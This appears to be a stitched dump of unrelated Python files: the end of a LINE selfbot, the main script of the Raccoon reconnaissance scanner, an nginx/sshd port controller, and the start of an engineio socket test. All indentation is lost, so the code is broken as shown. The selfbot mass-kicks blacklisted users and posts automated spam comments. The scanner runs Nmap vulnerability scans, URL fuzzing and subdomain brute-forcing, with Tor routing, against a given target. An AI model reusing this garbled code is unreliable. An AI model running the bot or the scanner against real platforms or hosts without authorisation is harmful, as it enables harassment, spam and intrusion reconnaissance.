#---------Fungsi Banlist With Tag Finish--------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill"]:
if msg.from_ in admin or staff:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"There was no blacklist user")
#ki2.sendText(msg.to,"There was no blacklist user")
#ki3.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
ki.sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(msg.to,[_mid])
ki.sendText(msg.to,"I pretended to cancel and canceled.")
elif "album→" in msg.text:
try:
albumtags = msg.text.replace("album→","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakec→","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "midb:" in msg.text:
midd = msg.text.replace("midb:","")
wait["blacklist"][midd] = True
elif "#終了" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By : IP\n\nhttp://line.me/ti/p/zuFNPuXyEb")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By: IP\n\nhhttp://line.me/ti/p/zuFNPuXyEb")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(500)
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
import time
import asyncio
import threading
import click
import sys
import os
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.3")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
|
controller.py
|
#!/usr/bin/env python
from __future__ import print_function
import logging
LOG_FORMAT = '%(asctime)s %(levelname)s %(pathname)s:%(lineno)s: %(message)s'
logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG)
import os
import signal
import sys
import six
import threading
import time
import pprint
import psutil
import atexit
import argparse
import jinja2
from flask import Flask, Response, url_for, render_template, jsonify, request, current_app
from flask.json import JSONEncoder
from flask_reverse_proxy import ReverseProxied
from tornado.netutil import Resolver
from tornado import gen
import socket
# Defaults
DEFAULT_WAIT_DELAY = 0.1
DEFAULT_CONTROL_SOCKET_PATH = '/var/run/connector.sock'
DEFAULT_NGINX_PID_FILE = '/var/log/nginx/nginx.pid'
DEFAULT_NGINX_CONF_FILE = '/etc/nginx/conf.d/default.conf'
DEFAULT_NGINX_PORT = 8080
DEFAULT_PORT = 9090
DEFAULT_HOST = '0.0.0.0'
class PortWatcher(object):
INSTANCE = None
@classmethod
def instance(cls):
return cls.INSTANCE
@classmethod
def start_instance(cls, *args, **kwargs):
if cls.INSTANCE is None:
cls.INSTANCE = cls(*args, **kwargs)
return cls.INSTANCE
def __init__(self, ports_changed_cb=None, wait_delay=DEFAULT_WAIT_DELAY):
self._ports_changed_cb = ports_changed_cb
self._wait_delay = wait_delay
self._thread_lock = threading.RLock()
self._thread = threading.Thread(name='PortWatchLoop', target=self._update_ports)
self._thread.daemon = True
self._stop_thread = False
self._ports = set()
self._thread.start()
logging.info('Started port watcher')
@property
def ports(self):
with self._thread_lock:
return self._ports.copy()
def _update_ports(self):
while True:
with self._thread_lock:
if self._stop_thread:
return
# get sshd ports
ports = set([])
try:
for proc in psutil.process_iter():
if proc.name() == 'sshd':
for conn in proc.connections():
laddr_ip = conn.laddr[0]
laddr_port = conn.laddr[1]
if conn.status == psutil.CONN_LISTEN and \
laddr_port != 22 and \
laddr_ip in ('127.0.0.1', 'localhost'):
# logging.info('Connection %r', conn)
ports.add(laddr_port)
except (psutil.AccessDenied, psutil.NoSuchProcess):
try:
for conn in psutil.net_connections('inet'):
laddr_ip = conn.laddr[0]
laddr_port = conn.laddr[1]
if conn.status == psutil.CONN_LISTEN and \
laddr_port != 22 and \
laddr_ip in ('127.0.0.1', 'localhost'):
if conn.pid is None and laddr_port > 1023:
# logging.info('Connection %r', conn)
ports.add(laddr_port) # unsafe
else:
for p in psutil.process_iter():
if p.pid == conn.pid and 'sshd' in p.name():
# logging.info('Connection %r', conn)
ports.add(laddr_port)
break
except psutil.AccessDenied:
logging.exception('Could not get any information about ports')
notify_ports = None
with self._thread_lock:
if self._ports != ports:
logging.info('Ports changed from %s to %s', self._ports, ports)
if self._ports_changed_cb:
notify_ports = ports.copy()
self._ports = ports
if notify_ports is not None:
self._ports_changed_cb(notify_ports)
del notify_ports
time.sleep(self._wait_delay)
def stop(self):
with self._thread_lock:
if self._stop_thread:
return
self._stop_thread = True
self._thread.join()
class RegisteredPort(object):
def __init__(self, port, name, type, description):
self.port = port
self.name = name
self.type = type
self.description = description
def __repr__(self):
return 'RegisteredPort(port=%r, name=%r, type=%r, description=%r' % \
(self.port, self.name, self.type, self.description)
def to_json(self):
return {'port': self.port,
'registered': True,
'name': self.name,
'type': self.type,
'description': self.description
}
class PortManagerException(Exception):
def __init__(self, message):
self.message = message
super(PortManagerException, self).__init__(message)
class PortManager(object):
def __init__(self, port_registered_cb=None, port_unregistered_cb=None):
self.registered_ports_by_port = {}
self.registered_ports_by_name = {}
self.bound_ports = set()
self.port_registered_cb = port_registered_cb
self.port_unregistered_cb = port_unregistered_cb
def register(self, port, name, type='tcp', description=None):
if port not in self.bound_ports:
raise PortManagerException('Port {} is not bound'.format(port))
if port in self.registered_ports_by_port:
raise PortManagerException('Port {} is already registered'.format(port))
if name in self.registered_ports_by_name:
raise PortManagerException('Port with name {} does already exist'.format(name))
rport = RegisteredPort(port=port, name=name, type=type, description=description)
self.registered_ports_by_port[port] = rport
self.registered_ports_by_name[name] = rport
if self.port_registered_cb:
self.port_registered_cb(rport)
return rport
def get_by_port(self, port):
return self.registered_ports_by_port.get(port, None)
def get_by_name(self, name):
return self.registered_ports_by_name.get(name, None)
def update_accessible_ports(self, ports):
removed_ports = self.bound_ports - ports
self.bound_ports = ports.copy()
for port in removed_ports:
self.unregister_by_port(port)
def unregister_by_port(self, port):
rport = self.registered_ports_by_port.get(port, None)
if rport is None:
return False
assert port == rport.port
del self.registered_ports_by_port[port]
del self.registered_ports_by_name[rport.name]
if self.port_unregistered_cb:
self.port_unregistered_cb(rport)
return True
def unregister_by_name(self, name):
rport = self.registered_ports_by_name.get(name, None)
if rport is None:
return False
assert name == rport.name
del self.registered_ports_by_name[name]
del self.registered_ports_by_port[rport.port]
if self.port_unregistered_cb:
self.port_unregistered_cb(rport)
return True
def unregister(self, obj):
if isinstance(obj, RegisteredPort):
return self.unregister_by_port(obj.port)
if isinstance(obj, six.integer_types):
return self.unregister_by_port(obj)
else:
return self.unregister_by_name(obj)
def to_json(self):
d = []
for v in six.itervalues(self.registered_ports_by_port):
d.append(v.to_json())
for p in self.bound_ports:
if p not in self.registered_ports_by_port:
d.append({'port': p, 'registered': False})
return d
class NginxTemplateGenerator(object):
def __init__(self,
nginx_port=DEFAULT_NGINX_PORT,
nginx_conf_file=DEFAULT_NGINX_CONF_FILE,
nginx_pid_file=DEFAULT_NGINX_PID_FILE,
controller_port=DEFAULT_PORT):
self.nginx_port = nginx_port
self.nginx_conf_file = nginx_conf_file
self.nginx_pid_file = nginx_pid_file
self.controller_port = controller_port
dir = os.path.dirname(__file__)
self.env = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.join(dir, 'templates')))
self.template = self.env.get_template('default.conf.j2')
def generate(self, port_manager):
output = self.template.render(
controller_port=self.controller_port,
nginx_port=self.nginx_port,
bound_ports=port_manager.bound_ports,
registered_ports_by_port=port_manager.registered_ports_by_port,
registered_ports_by_name=port_manager.registered_ports_by_name)
with open(self.nginx_conf_file, 'wb') as fd:
fd.write(output)
def reload_nginx_config(self):
try:
with open(self.nginx_pid_file, 'r') as fd:
pid = int(fd.read().strip())
os.kill(pid, signal.SIGHUP)
return True
except Exception:
logging.exception('Could not reload nginx configuration')
return False
# Global Data
LOCK = threading.RLock()
PORT_MANAGER = None # Shared, locked by LOCK
NGINX_TEMPLATE_GEN = None # Shared, locked by LOCK
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, PortManager):
return obj.to_json()
elif isinstance(obj, RegisteredPort):
return obj.to_json()
return JSONEncoder.default(self, obj)
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
app.json_encoder = CustomJSONEncoder
control_app = Flask(__name__)
control_app.json_encoder = CustomJSONEncoder
HTTP_OK = 200
HTTP_NO_CONTENT = 204
HTTP_BAD_REQUEST = 400
HTTP_NOT_FOUND = 404
HTTP_INTERNAL_SERVER_ERROR = 500
HTTP_NOT_IMPLEMENTED = 501
def error_response(message, status_code=HTTP_INTERNAL_SERVER_ERROR):
response = jsonify({'error': message, 'status': status_code})
response.status_code = status_code
return response
def bad_request(message):
return error_response(message=message, status_code=HTTP_BAD_REQUEST)
class BadRequestError(Exception):
def __init__(self, message):
self.message = message
super(BadRequestError, self).__init__(message)
@app.errorhandler(BadRequestError)
@control_app.errorhandler(BadRequestError)
def on_bad_request_error(error):
return bad_request(error.message)
@app.errorhandler(PortManagerException)
@control_app.errorhandler(PortManagerException)
def on_port_manager_exception(error):
return bad_request('PortManager error: ' + error.message)
@app.route("/", methods=["GET"])
def get_root():
global PORT_MANAGER, LOCK
with LOCK:
return render_template("index.html",
bound_ports=PORT_MANAGER.bound_ports,
registered_ports_by_port=PORT_MANAGER.registered_ports_by_port,
registered_ports_by_name=PORT_MANAGER.registered_ports_by_name)
@control_app.route("/", methods=["GET"])
def control_get_root():
return "Control server"
@control_app.route("/ports/")
@app.route("/ports/")
def get_ports():
with LOCK:
return jsonify(PORT_MANAGER)
@app.route("/reload_nginx_config")
def get_reload_nginx_config():
if NGINX_TEMPLATE_GEN.reload_nginx_config():
return 'Success'
else:
return 'Reload failed'
def default_value(value, default=None):
if not value:
return default
return value
@control_app.route("/ports/<port>", methods=["GET", "PUT", "DELETE"])
def control_ports(port):
if request.method == "GET":
with LOCK:
try:
port = int(port)
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
rport = PORT_MANAGER.get_by_port(port)
if rport is None:
return jsonify({'port': port, 'registered': False})
except ValueError:
rport = PORT_MANAGER.get_by_name(port)
if rport is None:
return error_response('No port with name {}'.format(port), HTTP_NOT_FOUND)
else:
return jsonify(rport)
elif request.method == "PUT":
data = request.get_json(silent=True)
if data is None:
return bad_request("No json data in body")
try:
port = int(port)
except ValueError:
return bad_request('Port must be an integer')
name = six.text_type(default_value(data.get("name"), default=port))
description = six.text_type(default_value(data.get("description"), default=""))
type = six.text_type(default_value(data.get("type"), default="tcp"))
with LOCK:
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
if PORT_MANAGER.get_by_port(port) is not None:
return bad_request("Port is already registered")
if PORT_MANAGER.get_by_name(name) is not None:
return bad_request("Name is already used")
return jsonify(PORT_MANAGER.register(port, name, type, description))
elif request.method == "DELETE":
with LOCK:
try:
port = int(port)
if port not in PORT_MANAGER.bound_ports:
return error_response('Port is not bound', HTTP_NOT_FOUND)
if not PORT_MANAGER.unregister_by_port(port):
return bad_request("Port is not registered")
except ValueError:
if not PORT_MANAGER.unregister_by_name(port):
return error_response('No port with name {}'.format(port), HTTP_NOT_FOUND)
return jsonify({})
@app.route("/api/debug/flask/", methods=["GET"])
@control_app.route("/api/debug/flask/", methods=["GET"])
def debug_flask():
import urllib
output = ['Rules:']
for rule in current_app.url_map.iter_rules():
options = {}
for arg in rule.arguments:
options[arg] = "[{0}]".format(arg)
if rule.methods:
methods = ','.join(rule.methods)
else:
methods = 'GET'
url = url_for(rule.endpoint, **options)
line = urllib.unquote("{:50s} {:20s} {}".format(rule.endpoint, methods, url))
output.append(line)
output.append('')
output.append('Request environment:')
for k, v in six.iteritems(request.environ):
output.append("{0}: {1}".format(k, pprint.pformat(v, depth=5)))
return Response('\n'.join(output), mimetype='text/plain')
class UnixResolver(Resolver):
def initialize(self, socket_file, resolver):
self.socket_file = socket_file
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
if host == 'unixsocket':
raise gen.Return([(socket.AF_UNIX, self.socket_file)])
result = yield self.resolver.resolve(host, port, *args, **kwargs)
raise gen.Return(result)
def start_server(args):
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.netutil import bind_unix_socket
logging.info('Run on host %s:%i', args.host, args.port)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(args.port, args.host)
if args.control_unix_socket:
control_server = HTTPServer(WSGIContainer(control_app))
socket = bind_unix_socket(args.control_unix_socket, mode=0o666)
control_server.add_socket(socket)
logging.info('Run control server on unix socket %s', args.control_unix_socket)
global NGINX_TEMPLATE_GEN, PORT_MANAGER, LOCK
NGINX_TEMPLATE_GEN = NginxTemplateGenerator(nginx_port=args.nginx_port,
nginx_conf_file=args.nginx_conf_file,
nginx_pid_file=args.nginx_pid_file,
controller_port=args.port)
def nginx_regenerate_conf():
NGINX_TEMPLATE_GEN.generate(PORT_MANAGER)
NGINX_TEMPLATE_GEN.reload_nginx_config()
PORT_MANAGER = PortManager(port_registered_cb=lambda rport: nginx_regenerate_conf(),
port_unregistered_cb=lambda rport: nginx_regenerate_conf())
nginx_regenerate_conf()
def on_ports_changed(new_ports):
with LOCK:
PORT_MANAGER.update_accessible_ports(new_ports)
PortWatcher.start_instance(ports_changed_cb=on_ports_changed, wait_delay=args.wait_delay)
loop = IOLoop.current()
def stop_ioloop():
logging.info('Stopping IOLoop')
loop.stop()
def signal_term_handler(signal, frame):
print('Got signal {}, exiting'.format(signal), file=sys.stderr)
stop_ioloop()
sys.exit(0)
def on_exit():
if args.control_unix_socket:
os.unlink(args.control_unix_socket)
signal.signal(signal.SIGTERM, signal_term_handler)
signal.signal(signal.SIGINT, signal_term_handler)
atexit.register(on_exit)
loop.start()
def register_port(args):
from tornado import gen, ioloop
from tornado.httpclient import HTTPError
from tornado.httpclient import AsyncHTTPClient
import json
if not os.path.exists(args.control_unix_socket):
print("Socket file {} does not exist !".format(args.control_unix_socket), file=sys.stderr)
sys.exit(1)
@gen.coroutine
def do_register():
resolver = UnixResolver(socket_file=args.control_unix_socket, resolver=Resolver())
AsyncHTTPClient.configure(None, resolver=resolver)
client = AsyncHTTPClient()
mtype = 'application/json'
headers = {'Content-Type': mtype}
body = json.dumps({"name": args.name, "type": args.type, "description": args.description})
try:
response = yield client.fetch('http://unixsocket/ports/{}'.format(args.port),
method='PUT',
headers=headers,
body=body)
except HTTPError as he:
print("Could not register port: {}".format(he), file=sys.stderr)
sys.exit(1)
except Exception as e:
logging.exception("Could not register port")
sys.exit(1)
print(response.body)
ioloop.IOLoop.current().run_sync(do_register)
def unregister_port(args):
from tornado import gen, ioloop
from tornado.httpclient import HTTPError
from tornado.httpclient import AsyncHTTPClient
import json
if not os.path.exists(args.control_unix_socket):
print("Socket file {} does not exist !".format(args.control_unix_socket), file=sys.stderr)
sys.exit(1)
@gen.coroutine
def do_unregister():
resolver = UnixResolver(socket_file=args.control_unix_socket, resolver=Resolver())
AsyncHTTPClient.configure(None, resolver=resolver)
client = AsyncHTTPClient()
try:
response = yield client.fetch('http://unixsocket/ports/{}'.format(args.port),
method='DELETE')
except HTTPError as he:
print("Could not unregister port: {}".format(he), file=sys.stderr)
sys.exit(1)
except Exception as e:
logging.exception("Could not unregister port")
sys.exit(1)
print(response.body)
ioloop.IOLoop.current().run_sync(do_unregister)
def main():
# from tornado.options import define, options
#
# define("port", default=9090, help="listen on the given port", type=int)
# define("host", default="0.0.0.0", help="listen on the given host")
# define("control_unix_socket", default=DEFAULT_CONTROL_SOCKET_PATH, help="path to the control unix socket to bind")
# define("nginx_pid_file", default=DEFAULT_NGINX_PID_FILE, help="Location of nginx PID file")
# define("nginx_conf_file", default=DEFAULT_NGINX_CONF_FILE, help="Location of nginx conf file")
parser = argparse.ArgumentParser(
description="Connector Controller",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("--debug", help='debug mode', action="store_true")
parser.add_argument("--control-unix-socket", default=DEFAULT_CONTROL_SOCKET_PATH,
help="path to the control unix socket to bind")
subparsers = parser.add_subparsers()
start_p = subparsers.add_parser('start', help='start server')
start_p.add_argument("-p", "--port", default=DEFAULT_PORT, help="listen on the given port", type=int)
start_p.add_argument("--host", default=DEFAULT_HOST, help="listen on the given host")
start_p.add_argument("--wait-delay", default=DEFAULT_WAIT_DELAY, help="wait delay in seconds between port checks")
start_p.add_argument("--nginx-port", default=DEFAULT_NGINX_PORT, help="nginx server port")
start_p.add_argument("--nginx-pid-file", default=DEFAULT_NGINX_PID_FILE, help="Location of nginx PID file")
start_p.add_argument("--nginx-conf-file", default=DEFAULT_NGINX_CONF_FILE, help="Location of nginx conf file")
start_p.set_defaults(func=start_server)
register_p = subparsers.add_parser('register', help='register port')
register_p.add_argument("port", help="port number", type=int)
register_p.add_argument("-n", "--name", default=None, help="port name")
register_p.add_argument("-t", "--type", default=None, help="port type")
register_p.add_argument("-d", "--description", default=None, help="port description")
register_p.set_defaults(func=register_port)
unregister_p = subparsers.add_parser('unregister', help='unregister port')
unregister_p.add_argument("port", help="port number or name")
unregister_p.set_defaults(func=unregister_port)
args = parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import exceptions
from engineio import packet
from engineio import payload
from engineio import socket
import pytest
class TestSocket(unittest.TestCase):
def setUp(self):
self.bg_tasks = []
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.2
mock_server.ping_interval = 0.2
mock_server.ping_interval_grace_period = 0.001
mock_server.async_handlers = True
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server._async = {
'threading': threading.Thread,
'queue': queue.Queue,
'websocket': None,
}
def bg_task(target, *args, **kwargs):
th = threading.Thread(target=target, args=args, kwargs=kwargs)
self.bg_tasks.append(th)
th.start()
return th
def create_queue(*args, **kwargs):
return queue.Queue(*args, **kwargs)
mock_server.start_background_task = bg_task
mock_server.create_queue = create_queue
mock_server.get_queue_empty_exception.return_value = queue.Empty
return mock_server
def _join_bg_tasks(self):
for task in self.bg_tasks:
task.join()
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
assert s.server == mock_server
assert s.sid == 'sid'
assert not s.upgraded
assert not s.closed
assert hasattr(s.queue, 'get')
assert hasattr(s.queue, 'put')
assert hasattr(s.queue, 'task_done')
assert hasattr(s.queue, 'join')
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
with pytest.raises(exceptions.QueueEmpty):
s.poll()
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
